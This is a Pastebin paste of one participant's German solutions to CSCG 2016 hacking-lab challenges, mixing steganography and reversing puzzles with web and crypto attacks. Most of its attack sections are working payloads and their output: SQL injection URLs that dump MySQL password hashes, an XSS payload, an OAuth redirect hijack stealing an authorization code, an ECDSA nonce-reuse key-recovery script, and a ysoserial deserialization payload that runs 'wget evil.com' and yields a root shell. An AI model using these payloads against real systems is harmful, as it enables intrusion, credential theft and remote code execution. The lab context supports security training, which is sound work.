API tools faq
paste
Guest User

itsumade cscg 2016

a guest
Aug 28th, 2016
212
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.79 KB | None | 0 0
raw download clone embed print report
  1. itsumades Loesungen cscg 2016:
  2.  
  3. 5215 wordpressplugger ------------:
  4.  
  5. GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=1
  6. -> Liefert das Ergebnis von Kalender id 1.
  7. GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=2
  8. -> Liefert kein Ergebnis
  9. GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=2-1
  10. -> Liefert wiederum Ergebnis von id 1.
  11.  
  12. GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=1ORDER/**/BY/**/14
  13. -> Liefert id 1.
  14.  
  15. GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=0/**/union/**/select/**/1,2,3,4,count(user),6,7,8,9,10,11,12,13,14/**/from/**/mysql.user
  16. -> Zeigt im "Subject"-Feld eine 6. Also existieren 6 Eintraege:
  17.  
  18. GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=0/**/union/**/select/**/1,2,3,4,group_concat(user,0x3a,password),6,7,8,9,10,11,12,13,14/**/from/**/mysql.user
  19. -> root:*09753075E6FEF0002CC255046396E59A1ED19BB1,
  20. <selber eintrag>
  21. <selber eintrag>
  22. <selber eintrag>
  23. debian-sys-maint:*6ABC3CC789E7C360B292AF4FE1DF816C2C53488D,
  24. wpuser:*C9B2DB1CA193280B971CA3602D5174A5D637D2BF
  25.  
  26. Patch: + $_GET["id"] = intval($_GET["id"]);
  27.  
  28. 5212 Hello my name is ------------:
  29.  
  30. http://348bc741d2dc.i.hacking-lab.com/card.php?name=Yolo&size=467" onload="eval(document.location.hash.slice(1))">#alert(1337)
  31. Patch: $size = htmlspecialchars($_GET['size'], ENT_QUOTES);
  32.  
  33. 7550 Princess in Distress ------------:
  34.  
  35. #!/usr/bin/perl
  36. open F, '<', 'input.html';
  37. do {
  38. local $/;
  39. $content = <F>;
  40. };
  41. close F;
  42.  
  43. $content =~ s/\s/|/g;
  44. $content =~ s/[^|]+/ /g;
  45.  
  46. $binary = '';
  47. for (split / /, $content) {
  48. $binary .= '0' if $_ eq '|';
  49. $binary .= '1' if $_ eq '||';
  50. }
  51.  
  52. print pack 'B*', $binary;
  53.  
  54. Ausgabe: What is a man? A miserable little pile of secrets: \x89PNG^M...
  55.  
  56. $ file output
  57. output: PNG image data, 320 x 224, 8-bit/color RGB, non-interlaced
  58.  
  59. #!/usr/bin/perl
  60. use GD;
  61.  
  62. $img = GD::Image->new('output.png');
  63.  
  64. $binary = '';
  65. for $y (0 .. 6) {
  66. for $x (0 .. 319) {
  67. ($r, $g, $b) = $img->rgb($img->getPixel($x, $y));
  68. $binary .= '0' if $r > 80;
  69. $binary .= '1' if $r < 80;
  70. }
  71. }
  72.  
  73. print pack 'B*', $binary;
  74.  
  75. Ausgabe:
  76.  
  77. This is not the file you're looking for... *jedi gesture*
  78. If you look carefuly, sometimes a file can hide another..
  79.  
  80. By the way, should you stumble upon a locked chest during
  81. your quest, this key will have it opened, once unciphered
  82. with the magic number of 1337:
  83.  
  84. BQRAIHUJBVWSF
  85.  
  86. Gronsfeld Verschluesselung:
  87. "BQRAIHUJBVWSF" entschluesselt mit Key "1337" ergibt: "ANOTHERCASTLE".
  88.  
  89. $ binwalk output
  90.  
  91. DECIMAL HEXADECIMAL DESCRIPTION
  92. --------------------------------------------------------------------------------
  93. 51 0x33 PNG image, 320 x 224, 8-bit/color RGB, non-interlaced
  94. 92 0x5C Zlib compressed data, default compression, uncompressed size >= 215264
  95. 3450 0xD7A PNG image, 256 x 224, 8-bit/color RGB, non-interlaced
  96. 3491 0xDA3 Zlib compressed data, default compression, uncompressed size >= 172256
  97.  
  98. $ 7z e out.zip -y -pANOTHERCASTLE
  99. $ file mario.xm
  100. mario.xm: Fasttracker II module sound data Title: "super mario brothers\032FastTracker v2.00 \004\001\024\001"
  101. $ strings mario.xm
  102. ...
  103. IFOUNDTHEPRINCESS
  104. greenbass:mel-o-d/hbe
  105. I hope you had fun!
  106. ------------- Tenchi
  107.  
  108. 7554 Binary Tricks ------------:
  109. $ ltrace ./houdini.bin
  110. __libc_start_main(0x40078a, 1, 0x7fff42d88e28, 0x400930 <unfinished ...>
  111. getenv("ADMIN")
  112. atoi(0x7fff42d89fd6, 0x7fff42d88cf2, 3, 2)
  113. setenv("ADMIN", "-1", 1)
  114. printf("What did you expect?")
  115. ...
  116.  
  117. 0x00000000004006fe <+142>: movzbl 0x200713(%rip),%eax # 0x600e18 == 'A'
  118. 0x0000000000400705 <+149>: mov %al,-0x10(%rbp)
  119. 0x0000000000400708 <+152>: movzbl 0x200703(%rip),%eax # 0x600e12 == 'D'
  120. 0x000000000040070f <+159>: mov %al,-0xf(%rbp)
  121. 0x0000000000400712 <+162>: movzbl 0x2006fb(%rip),%eax # 0x600e14 == 'M'
  122. 0x0000000000400719 <+169>: mov %al,-0xe(%rbp)
  123. 0x000000000040071c <+172>: movzbl 0x2006f3(%rip),%eax # 0x600e16 == 'I'
  124. 0x0000000000400723 <+179>: mov %al,-0xd(%rbp)
  125. 0x0000000000400726 <+182>: movzbl 0x2006e3(%rip),%eax # 0x600e10 == 'N'
  126. 0x000000000040072d <+189>: mov %al,-0xc(%rbp)
  127. 0x0000000000400730 <+192>: movb $0x0,-0xb(%rbp)
  128. 0x0000000000400734 <+196>: lea -0x10(%rbp),%rax
  129. 0x0000000000400738 <+200>: mov %rax,%rdi
  130. 0x000000000040073b <+203>: callq 0x400560 <getenv@plt>
  131. 0x0000000000400740 <+208>: mov %rax,-0x8(%rbp)
  132. 0x0000000000400744 <+212>: cmpq $0x0,-0x8(%rbp)
  133. 0x0000000000400749 <+217>: je 0x400768 <register_tm_clones+248>
  134. 0x000000000040074b <+219>: mov -0x8(%rbp),%rax
  135. 0x000000000040074f <+223>: mov %rax,%rdi
  136. 0x0000000000400752 <+226>: callq 0x4005f0 <atoi@plt>
  137. 0x0000000000400757 <+231>: cmp $0x7ffffffa,%eax # atoi(getenv("ADMIN")) == 2147483642
  138.  
  139. hacker@096e684245c3:/opt/houdini$ ADMIN=2147483642 ./houdini.bin
  140. The flag is : {simsalabim /usr/bin !}
  141.  
  142. 4300 OAuth2 ------------:
  143.  
  144. redirect_uri=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorized
  145. -> Ok
  146. redirect_uri=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorizex
  147. -> OAuth Error
  148. redirect_uri=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorizedd
  149. -> Ok
  150. redirect_uri=httphttp%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorized
  151. -> Ok
  152.  
  153. Zunaechst den ersten Redirect mitschneiden, ihm aber nicht folgen:
  154. http://509876f5a784.i.hacking-lab.com:777/idp/oauth/authorize?response_type=code&client_id=VCWhuqHOGBEF1B5dWxK8xztgV8iLidLRS4kBd1sF&redirect_uri=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorized%3Fnext%3Dhttp%253A%252F%252F509876f5a784.i.hacking-lab.com%252Fapp1%252F&scope=email&state=lYWUgQVsI5kiUkbLMTXY
  155.  
  156. Der Redirect Parameter wird nun wie folgt modifiziert:
  157. http://509876f5a784.i.hacking-lab.com:777/idp/oauth/authorize?response_type=code&client_id=VCWhuqHOGBEF1B5dWxK8xztgV8iLidLRS4kBd1sF&redirect_uri=http%3a%2F%2Fmeine.domain.xxx%2f%3fxxx=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorized%3Fnext%3Dhttp%253A%252F%252F509876f5a784.i.hacking-lab.com%252Fapp1%252F&scope=email&state=lYWUgQVsI5kiUkbLMTXY
  158.  
  159. Auf meine.domain.xxx sehen wir nun folgenden Request eintreffen:
  160. GET /?xxx=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorized%3Fnext%3Dhttp%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2F&state=lYWUgQVsI5kiUkbLMTXY&code=h1BCbMj3gxZoVkTYYWv5Lpg1tVm2hg HTTP/1.1
  161. ...
  162. User-Agent: python-requests/2.2.1 CPython/2.7.6 Linux/3.10.0-327.13.1.el7.x86_64
  163.  
  164. code: h1BCbMj3gxZoVkTYYWv5Lpg1tVm2hg
  165.  
  166. http://509876f5a784.i.hacking-lab.com/app1/authorized?next=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2F&state=lYWUgQVsI5kiUkbLMTXY&code=h1BCbMj3gxZoVkTYYWv5Lpg1tVm2hg
  167.  
  168. Signed in as admin
  169. Gold nugget: k2PCyLoOXw-SWNbqsY4KUQNAtbBQVHqjOXcFGj8G
  170.  
  171. 7686 Breaking Elliptic Curve Cryptography ------------:
  172.  
  173. #!/usr/bin/perl
  174. use Crypt::PK::ECC;
  175. use Data::Dumper;
  176.  
  177. my $priv = Crypt::PK::ECC->new('private_key.pem');
  178. print Dumper($priv->key2hash);
  179.  
  180. Ausgabe:
  181.  
  182. $VAR1 = {
  183. 'size' => 24,
  184. 'curve_bytes' => 24,
  185. 'curve_name' => 'SECP192R1',
  186. 'curve_Gx' => '188DA80EB03090F67CBF20EB43A18800F4FF0AFD82FF1012',
  187. 'curve_B' => '64210519E59C80E70FA7E9AB72243049FEB8DEECC146B9B1',
  188. 'curve_order' => 'FFFFFFFFFFFFFFFFFFFFFFFF99DEF836146BC9B1B4D22831',
  189. 'curve_bits' => 192,
  190. 'k' => 'AC8577FF2504492E7CB6D5F8716D4C193728D8592B6F4225',
  191. 'curve_prime' => 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFF',
  192. 'curve_A' => 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFC',
  193. 'pub_x' => '1D590766F26A888B8C6C38E8A0ABDA1609B40955D1996620',
  194. 'curve_Gy' => '07192B95FFC8DA78631011ED6B24CDD573F977A11E794811',
  195. 'curve_cofactor' => 1,
  196. 'type' => 1,
  197. 'pub_y' => '8BD11F87E8F87AE0607F58BF68327DF2E5186D7D97F2C3F7'
  198. };
  199.  
  200. Standard NIST192p Kurve. Im Wireshark Dump sieht man die beiden Signaturen:
  201. sig = BRXVEpTGwCo1HsaTNmhJ5NynvUsdhFzvc1ilypdV4aDLRLIlVaCCkHsuN6EAet0 und sig2 = BRXVEpTGwCo1HsaTNmhJ5NynvUsdhFzvSvNuLoc421+3BZMMFukNTOztlpj9kf4e
  202. Aufgeteilt in (r, s) ist das
  203. (0515d51294c6c02a351ec693366849e4dca7bd4b1d845cef, 7358a5ca9755e1a0cb44b22555a082907b2e37a1007add3e) und
  204. (0515d51294c6c02a351ec693366849e4dca7bd4b1d845cef, 4af36e2e8738db5fb705930c16e90d4ceced9698fd91fe1e)
  205.  
  206. #!/usr/bin/python
  207. from hashlib import sha1
  208. import base64
  209. from ecdsa import numbertheory
  210.  
  211. m1 = int(sha1("iSsuZJOq1FNKMuK4wm88UEkr21wgsypW").hexdigest(),16)
  212. m2 = int(sha1("x3wqOnaetBPO66TrBaMyr3NQIDbhvK0w").hexdigest(),16)
  213.  
  214. r1 = int("0515d51294c6c02a351ec693366849e4dca7bd4b1d845cef", 16)
  215. s1 = int("7358a5ca9755e1a0cb44b22555a082907b2e37a1007add3e", 16)
  216. r1 = int("0515d51294c6c02a351ec693366849e4dca7bd4b1d845cef", 16)
  217. s2 = int("4af36e2e8738db5fb705930c16e90d4ceced9698fd91fe1e", 16)
  218. n = int("FFFFFFFFFFFFFFFFFFFFFFFF99DEF836146BC9B1B4D22831", 16)
  219.  
  220. _k = (m1 - m2) * numbertheory.inverse_mod(s1 - s2, n) % n
  221. _d = (s1 * _k - m1) * numbertheory.inverse_mod(r1, n) % n
  222. print hex(_d)
  223.  
  224. Ausgabe: 0x2f3c25b19905c1c0c5a75507064b94289c0b7064b16e2c31L
  225.  
  226. #!/usr/bin/python
  227. from ecdsa import SigningKey
  228. from ecdsa import NIST192p
  229. import base64
  230.  
  231. sk = SigningKey.from_pem(open("private_key.pem").read())
  232.  
  233. sk_new = sk.from_string("\x2f\x3c\x25\xb1\x99\x05\xc1\xc0\xc5\xa7\x55\x07\x06\x4b\x94\x28\x9c\x0b\x70\x64\xb1\x6e\x2c\x31", curve=NIST192p);
  234. message = "gDNv45g1l0pC9ytqsuL3fURuvL7OFJc4"
  235. sig = sk_new.sign(message)
  236. print base64.b64encode(sig)
  237.  
  238. Ausgabe:
  239. YKQBPvMtErS5rHvGKe1jXmETsKwFMWgnif0MxwwEnestC4+77wgS3H2RAbHf6Utd
  240.  
  241. Damit fuer die Nonce "gDNv45g1l0pC9ytqsuL3fURuvL7OFJc4" eingeloggt erhaelt man das Secret:
  242.  
  243. #This class will make everyone our slaves!
  244.  
  245. import evillib
  246. class EvilAlgorithm:
  247. def bad_function(self):
  248. evillib.evilyfy()
  249. print('Obey slaves!')
  250. evilness = "sooo evil!"
  251. return evilness
  252.  
  253. 5219 Rohde & Schwarz Cybersecurity-Challenge ------------:
  254. $ file hackme.beam
  255. hackme.beam: Erlang BEAM file
  256.  
  257. $ erl
  258. Erlang/OTP 17 [erts-6.2] [source] [64-bit] [smp:4:4] [async-threads:10] [kernel-poll:false]
  259.  
  260. Eshell V6.2 (abort with ^G)
  261. 1> io:format("~p~n",[beam_disasm:file("hackme.beam")]).
  262. {beam_file,hackme,
  263. [{module_info,0,4},{module_info,1,6},{start,0,2}],
  264. [{vsn,[284277428168876805194481449229875660789]}],
  265. [{options,[]},
  266. {version,"6.0"},
  267. {time,{2016,2,24,14,33,49}},
  268. {source,"/tmp/Untitled Folder/hackme.erl"}],
  269. [{function,start,0,2,
  270. [{label,1},
  271. {line,1},
  272. {func_info,{atom,hackme},{atom,start},0},
  273. {label,2},
  274. {allocate,0,0},
  275. {move,{literal,"'"},{x,1}},
  276. {move,{literal,"MuMuMuLoxkOtZnkNurk"},{x,0}},
  277. {line,2},
  278. {call_ext,2,{extfunc,string,concat,2}},
  279. {move,{literal,["Dpohsbut nbo! Aqw hkiwtgf qwv krz wr ehdw ivperk fieq jmpiw. Mjwj nx ymj kqfl: "]},
  280. {x,1}},
  281. {move,{literal,"Lets beat erlang files!~n~p"},{x,0}},
  282. {line,3},
  283. {call_ext_last,2,{extfunc,io,format,2},0}]},
  284. {function,module_info,0,4,
  285. [{line,0},
  286. {label,3},
  287. {func_info,{atom,hackme},{atom,module_info},0},
  288. {label,4},
  289. {move,{atom,hackme},{x,0}},
  290. {line,0},
  291. {call_ext_only,1,{extfunc,erlang,get_module_info,1}}]},
  292. {function,module_info,1,6,
  293. [{line,0},
  294. {label,5},
  295. {func_info,{atom,hackme},{atom,module_info},1},
  296. {label,6},
  297. {move,{x,0},{x,1}},
  298. {move,{atom,hackme},{x,0}},
  299. {line,0},
  300. {call_ext_only,2,
  301. {extfunc,erlang,get_module_info,2}}]}]}
  302. ok
  303. 2>
  304.  
  305. Verschluesselt: Aqw hkiwtgf qwv krz wr ehdw ivperk fieq jmpiw. Mjwj nx ymj kqfl: MuMuMuLoxkOtZnkNurk
  306. Entschluesselt: You figured out how to beat erlang beam files. Here is the flag: GoGoGoFireInTheHole
  307.  
  308. Login:
  309.  
  310. URL loginUrl = new URL(AcmeClient.getServerUrl() + "/login");
  311.  
  312. String urlParameters = String.format("username=%s&password=%s", new Object[] { username, password });
  313. byte[] postData = urlParameters.getBytes(StandardCharsets.UTF_8);
  314. int postDataLength = postData.length;
  315. HttpURLConnection conn = (HttpURLConnection)loginUrl.openConnection();
  316. conn.setRequestMethod("POST");
  317. conn.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
  318. conn.setRequestProperty("Content-Length", Integer.toString(postData.length));
  319. conn.setRequestProperty("charset", "utf-8");
  320. conn.setUseCaches(false);
  321. conn.setInstanceFollowRedirects(false);
  322. conn.setDoOutput(true);
  323. DataOutputStream wr = new DataOutputStream(conn.getOutputStream());
  324. wr.write(postData);
  325.  
  326.  
  327. POST /acme-server//login HTTP/1.1
  328. Content-Type: application/x-www-form-urlencoded
  329. charset: utf-8
  330. Cache-Control: no-cache
  331. Pragma: no-cache
  332. User-Agent: Java/1.8.0_65
  333. Host: 6f00328f7dc4.i.hacking-lab.com
  334. Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
  335. Connection: keep-alive
  336. Content-Length: 32
  337.  
  338. username=johndoe&password=123456
  339.  
  340. Response:
  341.  
  342. HTTP/1.1 200 OK
  343. Server: Apache-Coyote/1.1
  344. Content-Type: text/xml;charset=ISO-8859-1
  345. Content-Length: 270
  346. Date: Fri, 01 Jul 2016 13:52:21 GMT
  347.  
  348. <?xml version="1.0"?>
  349. <access-control>
  350. <right id="11">false</right>
  351. <right id="134">true</right>
  352. <right id="13">true</right>
  353. <right id="291">true</right>
  354. <right id="1024">false</right>
  355. <right id="987">false</right>
  356. <right id="1337">true</right>
  357. </access-control>
  358.  
  359. private void jButton1ActionPerformed(ActionEvent evt)
  360. {
  361. RecordBean record = new RecordBean();
  362. record.setLastName(this.fieldLastName.getText());
  363. record.setFirstName(this.fieldFirstName.getText());
  364. record.setGender(this.fieldGender.getModel().getSelectedItem().toString());
  365. record.setEmail(this.fieldEmail.getText());
  366. try
  367. {
  368. URL url = new URL(AcmeClient.getServerUrl() + "/adddata");
  369. HttpURLConnection conn = (HttpURLConnection)url.openConnection();
  370. conn.setDoOutput(true);
  371. ObjectOutputStream oos = new ObjectOutputStream(conn.getOutputStream());
  372. oos.writeObject(record);
  373. oos.flush();
  374. oos.close();
  375. conn.getResponseCode();
  376. }
  377. catch (Exception e)
  378. {
  379. throw new RuntimeException(e);
  380. }
  381. }
  382. }
  383.  
  384.  
  385. POST /acme-server/adddata HTTP/1.1
  386. ...
  387. Response:
  388. ...
  389. <b>exception</b></p><pre>java.io.StreamCorruptedException: invalid stream header: 75736572
  390. java.io.ObjectInputStream.readStreamHeader(ObjectInputStream.java:804)
  391. java.io.ObjectInputStream.&lt;init&gt;(ObjectInputStream.java:299)
  392. com.acme.server.AddDataServlet.processRequest(AddDataServlet.java:36)
  393. com.acme.server.AddDataServlet.doPost(AddDataServlet.java:71)
  394. javax.servlet.http.HttpServlet.service(HttpServlet.java:648)
  395. javax.servlet.http.HttpServlet.service(HttpServlet.java:729)
  396. org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
  397.  
  398. $ java -jar ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections5 'wget evil.com:8080/file -O /tmp/xxx' > stream.bin
  399.  
  400. POST /acme-server/adddata HTTP/1.1
  401. Content-Type: application/x-www-form-urlencoded
  402. charset: utf-8
  403. Cache-Control: no-cache
  404. Pragma: no-cache
  405. User-Agent: Java/1.8.0_65
  406. Host: b01ed7e7b10b.i.hacking-lab.com
  407. Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
  408. Connection: keep-alive
  409. Content-Length: 2078
  410.  
  411. ’...<Payload aus der Stream.bin>
  412.  
  413. $ nc -vlp 8080
  414. listening on [any] 8080 ...
  415. Warning: forward host lookup failed for host-246-102.compass-security.com:
  416. connect to [91.214.168.38] from host-246-102.compass-security.com [212.254.246.102] 42497
  417. id
  418. uid=0(root) gid=0(root) groups=0(root)
  419. ls -la
  420. total 124
  421. drwxr-sr-x. 10 root staff 4096 Jul 1 12:50 .
  422. drwxrwsr-x. 11 root staff 4096 Mar 15 22:15 ..
  423. -rw-r--r--. 1 root root 57011 Feb 2 19:39 LICENSE
  424. -rw-r--r--. 1 root root 1444 Feb 2 19:39 NOTICE
  425. -rw-r--r--. 1 root root 6741 Feb 2 19:39 RELEASE-NOTES
  426. -rw-r--r--. 1 root root 16195 Feb 2 19:39 RUNNING.txt
  427. drwxr-xr-x. 2 root root 4096 Mar 15 22:15 bin
  428. drwxr-xr-x. 3 root root 4096 Jul 1 12:50 conf
  429. drwxr-sr-x. 2 root staff 4096 Jul 1 12:50 dummy
  430. drwxr-xr-x. 2 root root 4096 Mar 15 22:15 lib
  431. drwxr-xr-x. 2 root root 4096 Jul 1 12:50 logs
  432. drwxr-xr-x. 2 root root 4096 Mar 15 22:15 temp
  433. drwxr-xr-x. 8 root root 4096 Jul 1 12:50 webapps
  434. drwxr-xr-x. 3 root root 4096 Jul 1 12:50 work
  435. cd /tmp
  436. ls
  437. goldnugget
  438. hsperfdata_root
  439. xxx
  440. cat goldnugget
  441. ZAhgt^L&NgTUWDwv577fY*A^G8y!EGUT
  442.  
  443. 5076 Listen Carefully ------------:
  444.  
  445. LSBs aus jeweils linken und rechtem Frame abwechseln:
  446.  
  447. #!/usr/bin/perl
  448. use Audio::SndFile;
  449.  
  450. $f = Audio::SndFile->open("<", "audio_file.wav");
  451. $ret = $f->read_short($buffer, $f->frames);
  452.  
  453. @values = unpack("S*", $buffer);
  454.  
  455. for (0 .. ~~@values - 1) {
  456. $left[$x++] = $values[$_] if $_ % 2 == 0;
  457. $right[$y++] = $values[$_] if $_ % 2 != 0;
  458. }
  459.  
  460. for (0 .. ~~@left - 1) {
  461. $str .= $left[$_] & 1 if $_ % 2 == 0;
  462. $str .= $right[$_] & 1 if $_ % 2 != 0;
  463. }
  464.  
  465. print substr pack('B*', $str), 0, 445;
  466.  
  467. $ perl solve.pl
  468. Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!